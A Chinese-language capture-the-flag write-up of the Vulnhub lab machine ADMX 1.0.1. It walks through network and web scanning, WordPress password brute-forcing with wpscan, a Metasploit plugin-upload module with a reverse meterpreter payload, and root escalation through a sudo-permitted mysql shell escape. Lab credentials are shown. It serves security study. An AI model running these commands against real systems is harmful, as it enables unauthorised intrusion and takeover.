Vulnhub ADMX 1.0.1 WriteUp

  • A+
所属分类:安全文章

不定期渗透日记:ADMX 1.0.1

Vulnhub ADMX 1.0.1 WriteUp

  • 不定期渗透日记:ADMX 1.0.1

  • 前言

    • Description

  • 信息收集

  • 权限提升

前言

本次渗透皆为靶机环境,文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

  • 靶机地址:http://www.vulnhub.com/entry/admx-101,694/

Description

Back to the Top

AdmX is an easy/medium machine built for OSCP aspirants. For any queries please contact me on twitter: @deathflash1411

## Changelog 2021-05-11 - v1.0.1 2021-05-06 - v1.0.0

本次渗透涉及到的关键知识点:

  • Web 信息收集
  • Wordpress 管理员权限上传 Payload(wp_admin_shell_upload)
  • SUDO 配合 MySQL 提权
  • ……

信息收集

首先使用 Kali 中的 arp-scan 工具扫描内网资产:

arp-scan --interface=eth0 192.168.226.0/24
Vulnhub ADMX 1.0.1 WriteUp
image-20210520150449861

发现目标主机 192.168.226.134,使用 nmap 扫描其端口服务等信息:

nmap -sC -sV -p- -sT 192.168.226.134
Vulnhub ADMX 1.0.1 WriteUp
image-20210520150755165

就开了一个 80 口,访问之:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520150910662

是一个 apache2 的初始页面。

使用 dirsearch 进行目录扫描:

dirsearch -u http://192.168.226.134/ -e* -w /usr/share/dirb/wordlists/common.txt
Vulnhub ADMX 1.0.1 WriteUp
image-20210520151016391

发现两个关键目录:tools 和 wordpress。tools 目录禁止访问:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520151103679

wordpress 目录就不用说了吧:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520151239167

深入挖掘 wordpress 目录:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520151609768

下面我们使用 wpscan 枚举 wordpress 上存在的用户:

wpscan --url http://192.168.226.134/wordpress --enumerate u
Vulnhub ADMX 1.0.1 WriteUp
image-20210520151834036

只发现了一个 admin 用户,下面尝试爆破该用户的密码。

使用 cewl 爬取整个网站上的关键字并生成一个字典:

cewl http://192.168.226.134/wordpress/ > wordlists.txt
Vulnhub ADMX 1.0.1 WriteUp
image-20210520152108076

然后使用 wpscan 并配合刚才生成的字典对 admin 用户进行爆破:

wpscan --url http://192.168.226.134/wordpress/ -U admin -P wordlists.txt
Vulnhub ADMX 1.0.1 WriteUp
image-20210520152148212

爆破失败。我们换一个更加强大的字典试试:

wpscan --url http://192.168.226.134/wordpress/ -U admin -P /usr/share/wordlists/rockyou.txt
Vulnhub ADMX 1.0.1 WriteUp
image-20210520152838492

竟然成功了!得到 admin 的密码为 adam14,我们访问 wp-login.php 尝试登录:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520153129276

这 TM 也太拉了,卡的要死……

Vulnhub ADMX 1.0.1 WriteUp
image-20210520153524622

???啊这???什么情况???

Vulnhub ADMX 1.0.1 WriteUp
A844F3D3A33CFD317D91C42D86FA61AD

不知道怎么回事……没事,稳住!

我们知道 WordPress 在管理员权限下有两种常见的 Getshell 的方式:

  • 一种是编辑 Themes 中的 PHP 文件,将 Webshell 的代码添加进去,访问 PHP 页面来 Getshell
  • 另一种是直接用 Metasploit 中 exploit/unix/webapp/wp_admin_shell_upload 模块,利用管理员的权限直接上传 Payload 反弹 meterpreter。

既然我们有了管理员的密码,那我们不妨试一试第二种方法:

use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.226.134
set targeturi /wordpress
set username admin
set password adam14
set payload php/meterpreter/reverse_tcp
set lhost 192.168.226.128
set lport 4444
run

执行后,该模块会生成一个 wordpress 插件,并把 Payload 打包进去,然后将插件利用管理员的权限上传并安装到目标上去。如下图,成功得到目标主机的 meterpreter:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520155623271

攻击成功。

权限提升

进入 shell 发现目标主机存在 python3 环境,然后我们可以使用 python3 模拟一个终端:

python3 -c "import pty;pty.spawn('/bin/bash');"
Vulnhub ADMX 1.0.1 WriteUp
image-20210520160310208

flag 没有在根目录中:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520161008938

会不会在 MySql 中呢?我们在 wordpress 的配置文件 wp-config.php 中找到了 MySQL 的连接密码:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520161253503

直接登陆 MySQL:

mysql -uadmin -pWp_Admin#123
Vulnhub ADMX 1.0.1 WriteUp
image-20210520161416982

但是搜了一遍什么也没有找到。那么 flag 应该就是在 /root 目录里了,接下来就要想办法提权了。

查看 /etc/passwd 发现存在一个 wpadmin 用户:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520161644400

那我们尝试一下能不能切换到 wpadmin 用户,密码用之前 wordpress 爆破得到的 adam14:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520161947726

竟然成功了。

执行 sudo -l 发现该用户能无需输入密码便可以 root 权限执行 mysql 登录命令:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520162119698

并且登陆的 mysql 用户为 root,那我们便可以进入 mysql 命令行来以 root 权限执行命令了:

sudo /usr/bin/mysql -u root -D wordpress -p

! <命令>
Vulnhub ADMX 1.0.1 WriteUp
image-20210520162315033

直接执行 ! /bin/bash 即可得到一个 root 权限的 Bash:

Vulnhub ADMX 1.0.1 WriteUp
image-20210520162622115

本文始发于微信公众号(山警网络空间安全与电子数据取证):Vulnhub ADMX 1.0.1 WriteUp

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: